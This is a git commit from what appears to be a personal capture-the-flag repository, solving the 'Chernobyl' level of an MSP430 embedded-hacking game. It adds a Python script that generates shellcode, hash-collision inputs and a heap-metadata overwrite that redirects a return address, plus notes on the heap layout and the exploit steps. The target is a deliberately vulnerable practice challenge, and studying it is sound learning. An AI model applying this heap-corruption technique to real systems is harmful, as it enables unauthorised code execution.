Solve Chernobyl

2024-11-21 19:25:59 +00:00 · 2022-09-02 06:24:41 -05:00 · 2022-09-02 06:24:41 -05:00 · f63718bc9b
commit f63718bc9b
parent 31df36d848
3 changed files with 75 additions and 17 deletions
--- a/17-Chernobyl/Code/crappy_python/chernobreak.py
+++ b/17-Chernobyl/Code/crappy_python/chernobreak.py
@ -0,0 +1,53 @@
+#!/usr/bin/env python3
+
+# user info
+user_struct_size = 0x12 # User is a tuple of (char[16], i16)
+
+users_per_box = 0x5
+
+# Stack info
+ret_stack_addr  = 0x3dce - 0x0004 # 3nd index of header struct
+ret_addr        = 0x49a2          # Address that will be returned to
+stackbuffer_top = 0x3df0 - 0x0006 # top of stack buffer, PLUS "new "
+target_offset   = ((stackbuffer_top - ret_addr) & 0xffff) + 1
+
+print(f"{ret_stack_addr = :x}, {ret_addr = :x}, {target_offset = :x}");
+
+bnew = b'new '
+
+clobber = ret_stack_addr.to_bytes(2, 'little').hex() + 'fc50' + target_offset.to_bytes(2, 'little').hex()
+
+'''
+sub.b #1, r8   5883
+swpb r8        8810
+mov r8, sr     0248
+mov #4cfc, pc  3040 fc4c
+'''
+payload = "5883 8810 0248 3040fc4c"
+
+# Hash function, which governs the boxes
+def hash(byts: bytes):
+   ret = 0;
+   for c in byts:
+      ret += c
+      ret = ((ret << 5) - ret) & 0xffff
+   return ret
+
+# Fix a string by adding a character that causes a hash collision
+def fixhash(name:bytes, box:int, modulus:int):
+   error = box - (hash(name) % modulus)
+   if error % modulus == 0:
+      return name
+   name += (ord("@")+error+modulus).to_bytes(1, "big")
+   print(f"{name.hex() = }; {error = }; new box = {hash(name) % modulus}")
+   return name
+
+def a2h (s: str):
+   return bytes(s, 'ascii').hex()
+payload = f'{a2h("new ")} {fixhash(bytes.fromhex(payload), 0, 16).hex()} {a2h(" ;new 8 ;new @ ;new H ;new P ;")} {bnew.hex()} {fixhash(bytes.fromhex(clobber), 0, 16).hex()} {a2h(" ;new 1 ;new 9 ;new A ;new I ;new Q ;new")}'
+print(payload)
+
+exit(0)
+while 1:
+   name, box = input("> ").split()
+   print(fixhash(bytes(name, "ascii"), int(box), 16).decode('ascii'));
--- a/17-Chernobyl/Notes
+++ b/17-Chernobyl/Notes
@ -1,23 +1,23 @@

 Hash Table, plus one full box:
-
-5000: 0050 1050 1500 0b00 0300 0500 1650 2c50   .P.P.........P,P
-5010: 0050 2650 2100 4250 a250 0251 6251 c251   .P&P!.BP.P.QbQ.Q
-5020: 2252 8252 e252 1050 3c50 2100 0b00 0000   "R.R.R.P<P!.....
-5030: 0000 0000 0000 0000 0000 0000 2650 9c50   ............&P.P
-5040: b500 4141 4141 4141 4141 4141 4141 4141   ..AAAAAAAAAAAAAA
+      0  1 2  3 4  5 6  7 8  9 a  b c  d e  f
+5000:[0050 1050 1500]0b00 0300 0500 1650 2c50   .P.P.........P,P
+5010:[0050 2650 2100]4250 a250 0251 6251 c251   .P&P!.BP.P.QbQ.Q
+5020: 2252 8252 e252[1050 3c50 2100]0b00 0000   "R.R.R.P<P!.....
+5030: 0000 0000 0000 0000 0000 0000[2650 9c50   ............&P.P
+5040: b500]4141 4141 4141 4141 4141 4141 4141   ..AAAAAAAAAAAAAA
 5050: 4100 e004 4141 4141 4141 4141 4141 4141   A...AAAAAAAAAAAA
 5060: 4141 4100 e004 4141 4141 4141 4141 4141   AAA...AAAAAAAAAA
 5070: 4141 4141 4100 e004 4141 4141 4141 4141   AAAAA...AAAAAAAA
 5080: 4141 4141 4141 4100 e004 4141 4141 4141   AAAAAAA...AAAAAA
-5090: 4141 4141 4141 4141 4100 e004 4141 4141   AAAAAAAAA...AAAA ; wait a second
-50a0: 4141 4141 4141 4141 4141 4100 e004 4141   AAAAAAAAAAA...AA
+5090: 4141 4141 4141 4141 4100 e004[4141 4141   AAAAAAAAA...AAAA ; wait a second
+50a0: 4141]4141 4141 4141 4141 4100 e004 4141   AAAAAAAAAAA...AA
 50b0: 4141 4141 4141 4141 4141 4141 4100 e004   AAAAAAAAAAAAA...
 50c0: 4141 4141 4141 4141 4141 4141 4141 4100   AAAAAAAAAAAAAAA.
 50d0: e004 4141 4141 4141 4141 4141 4141 4141   ..AAAAAAAAAAAAAA
 50e0: 4100 e004 4141 4141 4141 4141 4141 4141   A...AAAAAAAAAAAA
-50f0: 4141 4100 e004 4141 4141 4800 9c50 5c51   AAA...AAAAH..P\Q
-5100: b500 0000 0000 e004 0000 0000 0000 0000   ................
+50f0: 4141 4100 e004 4141 4141 4800[9c50 5c51   AAA...AAAAH..P\Q
+5100: b500]0000 0000 e004 0000 0000 0000 0000   ................

 Heap metadata @ 2400: 0050 0080 0000
 Heap start: 0x5000
@ -51,10 +51,15 @@ Section header metadata @ 5026: 1050 3c50 2100
   [ Prev: 5010, Next: 503c, Size: 0010 ]
 Data: 0a00 0000 0000 0000 0000 0000 0000 0000

-
-The Exploit:
-When an 11th user is added, the software will attempt to double the size of the heap. Overwriting a heap Next pointer allows us toAAAA
-
-
 for c in ['1', '9', 'A', 'I', 'Q', '0', '8', '@', 'H', 'P', 'AAAAAAAAAAAAAAAA', '']:
   print(f'new {c} ;',end="")
+
+Malloc:
+- Checks to make sure next pointer is always ASCENDING
+- Does not check prev pointer!!!!
+
+The Exploit:
+- Overwrite the prev pointer of a block so that it points to ~ the return address on stack
+- Overwrite the size parameter so that, when added to the return address, it places pc somewhere nice
+- Place pc into a payload on the stack
+- INT 0x7f
--- a/readme.md
+++ b/readme.md
@ -29,5 +29,5 @@ Hopefully in the coming weeks I'll learn enough about malloc and free to get som
    Bangalore
 ### 2022 Jul 31 AM:
    Lagos
-### 2022 Jul 31 PM - Present Day:
-    Chernobyl (ongoing)
+### 2022 Jul 31 PM - 2022 Sep 2 AM:
+    Chernobyl